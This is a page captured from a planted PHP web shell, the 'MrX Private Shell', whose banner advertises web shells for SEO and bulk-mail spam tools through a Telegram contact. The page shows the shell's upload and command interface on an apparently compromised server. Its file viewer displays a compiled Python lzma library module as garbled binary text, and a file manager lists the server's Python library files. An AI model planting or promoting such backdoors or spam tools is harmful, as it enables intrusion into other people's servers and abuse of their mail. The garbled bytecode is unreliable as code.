__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

*�_iW4�	��Sr/SQrSSKrSSKrSSKrSSK7 SSKJrJr SSKrSr	Sr
"SS	\R5rSSS
SSSSSS.Sjjr
\S
SS4S
jr\SS4Sjrg)aSInterface to the liblzma compression library.

This module provides a class for reading and writing compressed files,
classes for incremental (de)compression, and convenience functions for
one-shot (de)compression.

These classes and functions support both the XZ and legacy LZMA
container formats, as well as raw compressed data streams.
)$�
CHECK_NONE�CHECK_CRC32�CHECK_CRC64�CHECK_SHA256�CHECK_ID_MAX�
CHECK_UNKNOWN�FILTER_LZMA1�FILTER_LZMA2�FILTER_DELTA�
FILTER_X86�FILTER_IA64�
FILTER_ARM�FILTER_ARMTHUMB�FILTER_POWERPC�FILTER_SPARC�FORMAT_AUTO�	FORMAT_XZ�FORMAT_ALONE�
FORMAT_RAW�MF_HC3�MF_HC4�MF_BT2�MF_BT3�MF_BT4�	MODE_FAST�MODE_NORMAL�PRESET_DEFAULT�PRESET_EXTREME�LZMACompressor�LZMADecompressor�LZMAFile�	LZMAError�open�compress�
decompress�is_check_supported�N)�*)�_encode_filter_properties�_decode_filter_properties��c���\rSrSrSrSSSSSS.SjjrSr\S5r\S	5r	\S
5r
SrSrS
r
SrSSjrSSjrSSjrSSjrSr\R*4SjrSrSrg)r �&a,A file object providing transparent LZMA (de)compression.

An LZMAFile can act as a wrapper for an existing file object, or
refer directly to a named file on disk.

Note that LZMAFile provides a *binary* file interface - data read
is returned as bytes, and data to be written must be given as bytes.
N�����format�check�preset�filtersc��SUlSUlSUlUS;a/US:wa[S5eUb[S5eUc[n[
nOFUS;a&Uc[n[n[X4XVS9Ul	S	Ul
O[S
RU55e[U[[[R 45(a4SU;aUS-
n["R$"X5UlSUlXplO:['US
5(d['US5(a
XlXplO[)S5eUR[
:XaE[*R,"UR[.[0X6S9n[2R4"U5Ulgg)a�Open an LZMA-compressed file in binary mode.

filename can be either an actual file name (given as a str,
bytes, or PathLike object), in which case the named file is
opened, or it can be an existing file object to read from or
write to.

mode can be "r" for reading (default), "w" for (over)writing,
"x" for creating exclusively, or "a" for appending. These can
equivalently be given as "rb", "wb", "xb" and "ab" respectively.

format specifies the container format to use for the file.
If mode is "r", this defaults to FORMAT_AUTO. Otherwise, the
default is FORMAT_XZ.

check specifies the integrity check to use. This argument can
only be used when opening a file for writing. For FORMAT_XZ,
the default is CHECK_CRC64. FORMAT_ALONE and FORMAT_RAW do not
support integrity checks - for these formats, check must be
omitted, or be CHECK_NONE.

When opening a file for reading, the *preset* argument is not
meaningful, and should be omitted. The *filters* argument should
also be omitted, except when format is FORMAT_RAW (in which case
it is required).

When opening a file for writing, the settings used by the
compressor can be specified either as a preset compression
level (with the *preset* argument), or in detail as a custom
filter chain (with the *filters* argument). For FORMAT_XZ and
FORMAT_ALONE, the default is to use the PRESET_DEFAULT preset
level. For FORMAT_RAW, the caller must always specify a filter
chain; the raw compressor does not support preset compression
levels.

preset (if provided) should be an integer in the range 0-9,
optionally OR-ed with the constant PRESET_EXTREME.

filters (if provided) should be a sequence of dicts. Each dict
should have an entry for "id" indicating ID of the filter, plus
additional entries for options to the filter.
NF)�r�rbr.zACannot specify an integrity check when opening a file for readingzICannot specify a preset compression level when opening a file for reading)�w�wb�a�ab�x�xbr/r&zInvalid mode: {!r}�bT�read�writez6filename must be a str, bytes, file or PathLike object)�trailing_errorr0r3)�_fp�_closefp�_mode�
ValueErrorr�
_MODE_READr�_MODE_WRITEr�_compressor�_posr0�
isinstance�str�bytes�os�PathLike�builtinsr"�hasattr�	TypeError�_compression�DecompressReaderrr!�io�BufferedReader�_buffer)	�self�filename�moder0r1r2r3�	mode_code�raws	         �/usr/lib/python3.13/lzma.py�__init__�LZMAFile.__init__1sf��X�����
���
��;����{� �"C�D�D��!� �"I�J�J��~�$��"�I�
�6�
6��~�"��#�I�-�V�5;� N�D���D�I��1�8�8��>�?�?��h��e�R�[�[� 9�:�:��$�������}�}�X�4�D�H� �D�M�"�J�
�X�v�
&�
&�'�(�G�*D�*D��H�"�J��T�U�U��:�:��#��/�/����:J�(��J�C��,�,�S�1�D�L�$�c�p�UR(agUR[:Xa"URR	5 SUlONUR[
:Xa:URRURR55 SUlUR(aURR	5 SUlSUl
g!SUlSUl
f=f!UR(aURR	5 SUlSUl
f!SUlSUl
f=f=f)z�Flush and close the file.

May be called more than once without error. Once the file is
closed, any other operation on it will raise a ValueError.
NF)�closedrCrErU�closerFrAr?rG�flushrB�rVs r[ra�LZMAFile.close�s����;�;��
	&��z�z�Z�'����"�"�$�#������{�*������t�/�/�5�5�7�8�#'�� �
&��=�=��H�H�N�N�$���� %��
�� ��� %��
��
&��=�=��H�H�N�N�$���� %��
�� ��� %��
�s0�BC&�+C�C#�&D5�(+D"�D5�"D2�2D5c��URSL$)zTrue if this file is closed.N)rArcs r[r`�LZMAFile.closed�s���x�x�4��r^c�N�UR5 URR$)N)�_check_not_closedrA�namercs r[ri�
LZMAFile.name�s����� ��x�x�}�}�r^c�2�UR[:XaS$S$)Nr8r6)rCrFrcs r[rX�
LZMAFile.mode�s���z�z�[�0�t�:�d�:r^c�V�UR5 URR5$)z3Return the file descriptor for the underlying file.)rhrA�filenorcs r[rn�LZMAFile.fileno�s����� ��x�x��� � r^c�d�UR5=(a URR5$)z)Return whether the file supports seeking.)�readablerU�seekablercs r[rr�LZMAFile.seekable�s ���}�}��:�4�<�<�#8�#8�#:�:r^c�H�UR5 UR[:H$)z/Return whether the file was opened for reading.)rhrCrErcs r[rq�LZMAFile.readable�s����� ��z�z�Z�'�'r^c�H�UR5 UR[:H$)z/Return whether the file was opened for writing.)rhrCrFrcs r[�writable�LZMAFile.writable�s����� ��z�z�[�(�(r^c�X�UR5 URRU5$)z�Return buffered data without advancing the file position.

Always returns at least one byte of data, unless at EOF.
The exact number of bytes returned is unspecified.
)�_check_can_readrU�peek�rV�sizes  r[r{�
LZMAFile.peek�s'��	
�����|�|� � ��&�&r^c�X�UR5 URRU5$)z�Read up to size uncompressed bytes from the file.

If size is negative or omitted, read until EOF is reached.
Returns b"" if the file is already at EOF.
)rzrUr>r|s  r[r>�
LZMAFile.read�s%��	
�����|�|� � ��&�&r^c��UR5 US:a[RnURR	U5$)z�Read up to size uncompressed bytes, while trying to avoid
making multiple reads from the underlying stream. Reads up to a
buffer's worth of data if size is negative.

Returns b"" if the file is at EOF.
r&)rzrS�DEFAULT_BUFFER_SIZErU�read1r|s  r[r��LZMAFile.read1�s7��	
�����!�8��)�)�D��|�|�!�!�$�'�'r^c�X�UR5 URRU5$)z�Read a line of uncompressed bytes from the file.

The terminating newline (if present) is retained. If size is
non-negative, no more than size bytes will be read (in which
case the line may be incomplete). Returns b'' if already at EOF.
)rzrU�readliner|s  r[r��LZMAFile.readline�s%��	
�����|�|�$�$�T�*�*r^c�8�UR5 [U[[45(a[	U5nO[U5nURnURRU5nURRU5 U=RU-
slU$)z�Write a bytes object to the file.

Returns the number of uncompressed bytes written, which is
always the length of data in bytes. Note that due to buffering,
the file on disk may not reflect the data written until close()
is called.
)�_check_can_writerIrK�	bytearray�len�
memoryview�nbytesrGr#rAr?rH)rV�data�length�
compresseds    r[r?�LZMAFile.write�sy��	
�����d�U�I�.�/�/���Y�F��d�#�D��[�[�F��%�%�.�.�t�4�
������z�"��	�	�V��	��
r^c�X�UR5 URRX5$)a�Change the file position.

The new position is specified by offset, relative to the
position indicated by whence. Possible values for whence are:

    0: start of stream (default): offset must not be negative
    1: current stream position
    2: end of stream; offset must not be positive

Returns the new file position.

Note that seeking is emulated, so depending on the parameters,
this operation may be extremely slow.
)�_check_can_seekrU�seek)rV�offset�whences   r[r��
LZMAFile.seek�s%��	
�����|�|� � ��0�0r^c��UR5 UR[:XaURR	5$UR
$)z!Return the current file position.)rhrCrErU�tellrHrcs r[r��
LZMAFile.tells7����� ��:�:��#��<�<�$�$�&�&��y�y�r^)rUrBrGrArCrH)Nr5)r.)�__name__�
__module__�__qualname__�__firstlineno__�__doc__r\ra�propertyr`rirXrnrrrqrwr{r>r�r�r?rS�SEEK_SETr�r��__static_attributes__�r^r[r r &s����S2��B�t�T�S2�j&�.� �� ������;��;�!�
;�(�
)�
	'�'�
(�+��*#%�+�+�1�$r^r r.)r0r1r2r3�encoding�errors�newlinec	�2�SU;aSU;a[SU<35eO*Ub[S5eUb[S5eUb[S5eURSS5n	[X	X#XES9n
SU;a-[R"U5n[R
"X�Xx5$U
$)	alOpen an LZMA-compressed file in binary or text mode.

filename can be either an actual file name (given as a str, bytes,
or PathLike object), in which case the named file is opened, or it
can be an existing file object to read from or write to.

The mode argument can be "r", "rb" (default), "w", "wb", "x", "xb",
"a", or "ab" for binary mode, or "rt", "wt", "xt", or "at" for text
mode.

The format, check, preset and filters arguments specify the
compression settings, as for LZMACompressor, LZMADecompressor and
LZMAFile.

For binary mode, this function is equivalent to the LZMAFile
constructor: LZMAFile(filename, mode, ...). In this case, the
encoding, errors and newline arguments must not be provided.

For text mode, an LZMAFile object is created, and wrapped in an
io.TextIOWrapper instance with the specified encoding, error
handling behavior, and line ending(s).

�tr=zInvalid mode: z0Argument 'encoding' not supported in binary modez.Argument 'errors' not supported in binary modez/Argument 'newline' not supported in binary mode�r/)rD�replacer rS�
text_encoding�
TextIOWrapper)rWrXr0r1r2r3r�r�r��lz_mode�binary_files           r[r"r"s���4�d�{��$�;��4�9�:�:�����O�P�P����M�N�N����N�O�O��l�l�3��#�G��8�V�"(�;�K��d�{��#�#�H�-������v�G�G��r^c�^�[XX45nURU5UR5-$)z�Compress a block of data.

Refer to LZMACompressor's docstring for a description of the
optional arguments *format*, *check*, *preset* and *filters*.

For incremental compression, use an LZMACompressor instead.
)rr#rb)r�r0r1r2r3�comps      r[r#r#Gs*���&��9�D��=�=�������-�-r^c��/n[XU5nURU5nURU5 UR(d[S5eUR
nU(dOMaSR
U5$![a U(aM%ef=f)z�Decompress a block of data.

Refer to LZMADecompressor's docstring for a description of the
optional arguments *format*, *check* and *filters*.

For incremental decompression, use an LZMADecompressor instead.
zACompressed data ended before the end-of-stream marker was reachedr^)rr$r!�append�eof�unused_data�join)r�r0�memlimitr3�results�decomp�ress       r[r$r$Ss����G�
�!�&�G�<��	��#�#�D�)�C�	���s���z�z��?�@�
@��!�!����� �8�8�G�����	����		�s�A6�6B�
B)r6)r��__all__rNrSrL�_lzmar(r)rQrErF�
BaseStreamr r"rr#rr$r�r^r[�<module>r�s������	�	��F���
���n�|�&�&�n�b-��B�t�T��t�T�-�`$�2�d�D�	.�(�$��r^

Filemanager

Name Type Size Permission Actions
__future__.cpython-313.pyc File 4.61 KB 0644
__hello__.cpython-313.pyc File 966 B 0644
_aix_support.cpython-313.pyc File 4.61 KB 0644
_android_support.cpython-313.pyc File 7.44 KB 0644
_apple_support.cpython-313.pyc File 3.4 KB 0644
_collections_abc.cpython-313.pyc File 45.6 KB 0644
_colorize.cpython-313.pyc File 3.92 KB 0644
_compat_pickle.cpython-313.pyc File 7.02 KB 0644
_compression.cpython-313.pyc File 7.62 KB 0644
_distutils_system_mod.cpython-313.pyc File 7.89 KB 0644
_ios_support.cpython-313.pyc File 2.65 KB 0644
_markupbase.cpython-313.pyc File 12.14 KB 0644
_opcode_metadata.cpython-313.pyc File 10.43 KB 0644
_osx_support.cpython-313.pyc File 17.7 KB 0644
_py_abc.cpython-313.pyc File 7.02 KB 0644
_pydatetime.cpython-313.pyc File 92.36 KB 0644
_pydecimal.cpython-313.pyc File 211.95 KB 0644
_pyio.cpython-313.pyc File 108.59 KB 0644
_pylong.cpython-313.pyc File 10.9 KB 0644
_sitebuiltins.cpython-313.pyc File 4.79 KB 0644
_strptime.cpython-313.pyc File 28.04 KB 0644
_sysconfigdata__linux_x86_64-linux-gnu.cpython-313.pyc File 60.07 KB 0644
_sysconfigdata__x86_64-linux-gnu.cpython-313.pyc File 60.06 KB 0644
_threading_local.cpython-313.pyc File 8.19 KB 0644
_weakrefset.cpython-313.pyc File 11.77 KB 0644
abc.cpython-313.pyc File 7.73 KB 0644
antigravity.cpython-313.pyc File 985 B 0644
argparse.cpython-313.pyc File 102.11 KB 0644
ast.cpython-313.pyc File 100.56 KB 0644
base64.cpython-313.pyc File 25.21 KB 0644
bdb.cpython-313.pyc File 39.61 KB 0644
bisect.cpython-313.pyc File 3.42 KB 0644
bz2.cpython-313.pyc File 14.81 KB 0644
cProfile.cpython-313.pyc File 8.46 KB 0644
calendar.cpython-313.pyc File 38.76 KB 0644
cmd.cpython-313.pyc File 18.52 KB 0644
code.cpython-313.pyc File 15.41 KB 0644
codecs.cpython-313.pyc File 39.59 KB 0644
codeop.cpython-313.pyc File 6.48 KB 0644
colorsys.cpython-313.pyc File 4.4 KB 0644
compileall.cpython-313.pyc File 20.22 KB 0644
configparser.cpython-313.pyc File 67.32 KB 0644
contextlib.cpython-313.pyc File 29.78 KB 0644
contextvars.cpython-313.pyc File 261 B 0644
copy.cpython-313.pyc File 10.38 KB 0644
copyreg.cpython-313.pyc File 7.36 KB 0644
csv.cpython-313.pyc File 20.21 KB 0644
dataclasses.cpython-313.pyc File 46.7 KB 0644
datetime.cpython-313.pyc File 411 B 0644
decimal.cpython-313.pyc File 2.93 KB 0644
difflib.cpython-313.pyc File 70.35 KB 0644
dis.cpython-313.pyc File 46.4 KB 0644
doctest.cpython-313.pyc File 105.01 KB 0644
enum.cpython-313.pyc File 83.7 KB 0644
filecmp.cpython-313.pyc File 14.67 KB 0644
fileinput.cpython-313.pyc File 20.15 KB 0644
fnmatch.cpython-313.pyc File 6.64 KB 0644
fractions.cpython-313.pyc File 37.42 KB 0644
ftplib.cpython-313.pyc File 41.34 KB 0644
functools.cpython-313.pyc File 41.26 KB 0644
genericpath.cpython-313.pyc File 7.63 KB 0644
getopt.cpython-313.pyc File 8.27 KB 0644
getpass.cpython-313.pyc File 7.14 KB 0644
gettext.cpython-313.pyc File 22.35 KB 0644
glob.cpython-313.pyc File 23.11 KB 0644
graphlib.cpython-313.pyc File 9.96 KB 0644
gzip.cpython-313.pyc File 31.23 KB 0644
hashlib.cpython-313.pyc File 7.99 KB 0644
heapq.cpython-313.pyc File 17.35 KB 0644
hmac.cpython-313.pyc File 10.41 KB 0644
imaplib.cpython-313.pyc File 61.18 KB 0644
inspect.cpython-313.pyc File 132.7 KB 0644
io.cpython-313.pyc File 4.17 KB 0644
ipaddress.cpython-313.pyc File 89.47 KB 0644
keyword.cpython-313.pyc File 1.02 KB 0644
linecache.cpython-313.pyc File 8.35 KB 0644
locale.cpython-313.pyc File 57.63 KB 0644
lzma.cpython-313.pyc File 15.35 KB 0644
mailbox.cpython-313.pyc File 115.95 KB 0644
mimetypes.cpython-313.pyc File 24.31 KB 0644
modulefinder.cpython-313.pyc File 27.73 KB 0644
netrc.cpython-313.pyc File 8.93 KB 0644
ntpath.cpython-313.pyc File 26.56 KB 0644
nturl2path.cpython-313.pyc File 2.67 KB 0644
numbers.cpython-313.pyc File 13.45 KB 0644
opcode.cpython-313.pyc File 3.97 KB 0644
operator.cpython-313.pyc File 16.96 KB 0644
optparse.cpython-313.pyc File 66 KB 0644
os.cpython-313.pyc File 44.75 KB 0644
pdb.cpython-313.pyc File 103.62 KB 0644
pickle.cpython-313.pyc File 76.57 KB 0644
pickletools.cpython-313.pyc File 78.54 KB 0644
pkgutil.cpython-313.pyc File 19.49 KB 0644
platform.cpython-313.pyc File 43.63 KB 0644
plistlib.cpython-313.pyc File 42.09 KB 0644
poplib.cpython-313.pyc File 17.99 KB 0644
posixpath.cpython-313.pyc File 17.7 KB 0644
pprint.cpython-313.pyc File 29 KB 0644
profile.cpython-313.pyc File 22.03 KB 0644
pstats.cpython-313.pyc File 36.97 KB 0644
pty.cpython-313.pyc File 7.23 KB 0644
py_compile.cpython-313.pyc File 9.83 KB 0644
pyclbr.cpython-313.pyc File 14.79 KB 0644
pydoc.cpython-313.pyc File 136.68 KB 0644
queue.cpython-313.pyc File 16.94 KB 0644
quopri.cpython-313.pyc File 9.34 KB 0644
random.cpython-313.pyc File 34.43 KB 0644
reprlib.cpython-313.pyc File 10.18 KB 0644
rlcompleter.cpython-313.pyc File 8.37 KB 0644
runpy.cpython-313.pyc File 14.05 KB 0644
sched.cpython-313.pyc File 7.42 KB 0644
secrets.cpython-313.pyc File 2.45 KB 0644
selectors.cpython-313.pyc File 25.74 KB 0644
shelve.cpython-313.pyc File 12.98 KB 0644
shlex.cpython-313.pyc File 14.5 KB 0644
shutil.cpython-313.pyc File 65.87 KB 0644
signal.cpython-313.pyc File 4.44 KB 0644
site.cpython-313.pyc File 31.86 KB 0644
sitecustomize.cpython-313.pyc File 299 B 0644
smtplib.cpython-313.pyc File 46.25 KB 0644
socket.cpython-313.pyc File 41.23 KB 0644
socketserver.cpython-313.pyc File 33.84 KB 0644
sre_compile.cpython-313.pyc File 627 B 0644
sre_constants.cpython-313.pyc File 630 B 0644
sre_parse.cpython-313.pyc File 623 B 0644
ssl.cpython-313.pyc File 63.68 KB 0644
stat.cpython-313.pyc File 5.39 KB 0644
statistics.cpython-313.pyc File 69.43 KB 0644
string.cpython-313.pyc File 11.38 KB 0644
stringprep.cpython-313.pyc File 24.67 KB 0644
struct.cpython-313.pyc File 325 B 0644
subprocess.cpython-313.pyc File 79.8 KB 0644
symtable.cpython-313.pyc File 22.65 KB 0644
tabnanny.cpython-313.pyc File 12.13 KB 0644
tarfile.cpython-313.pyc File 122.79 KB 0644
tempfile.cpython-313.pyc File 48.68 KB 0644
textwrap.cpython-313.pyc File 17.51 KB 0644
this.cpython-313.pyc File 1.38 KB 0644
threading.cpython-313.pyc File 61.72 KB 0644
timeit.cpython-313.pyc File 14.29 KB 0644
token.cpython-313.pyc File 3.49 KB 0644
tokenize.cpython-313.pyc File 24.84 KB 0644
trace.cpython-313.pyc File 33.17 KB 0644
traceback.cpython-313.pyc File 69.38 KB 0644
tracemalloc.cpython-313.pyc File 26.77 KB 0644
tty.cpython-313.pyc File 2.6 KB 0644
turtle.cpython-313.pyc File 171.21 KB 0644
types.cpython-313.pyc File 15.18 KB 0644
typing.cpython-313.pyc File 150.96 KB 0644
uuid.cpython-313.pyc File 31.4 KB 0644
warnings.cpython-313.pyc File 28.85 KB 0644
wave.cpython-313.pyc File 32.44 KB 0644
weakref.cpython-313.pyc File 31.06 KB 0644
webbrowser.cpython-313.pyc File 26.26 KB 0644
zipapp.cpython-313.pyc File 10.15 KB 0644
zipimport.cpython-313.pyc File 25.89 KB 0644
Filemanager